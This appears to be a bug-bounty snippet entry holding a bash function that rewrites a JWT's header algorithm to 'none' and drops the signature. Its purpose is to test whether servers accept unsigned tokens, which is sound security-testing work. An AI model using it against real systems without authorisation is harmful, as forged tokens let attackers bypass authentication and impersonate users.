title = "Set 'none' as a JWT algorythm"
description = "Get a JWT and returns it with 'none' as its algorythm, and without signature"
tags = ["jwt", "web", "bash", "bug bounty"]
source = []

[[data]]
description = ""
language = "bash"
command = """function jwtnonefy(){
   header=$(echo "$1" | \
          cut -d. -f1 | \
          base64 -d | \
          sed -E "s/\"alg\":\"([^\"]+)\"/\"alg\":\"none\"/g" | \
          base64 | \
          sed 's/=//g');
   payload=$(echo "$1" | cut -d. -f 2);
   echo -e "\n"$header.$payload.
}"""
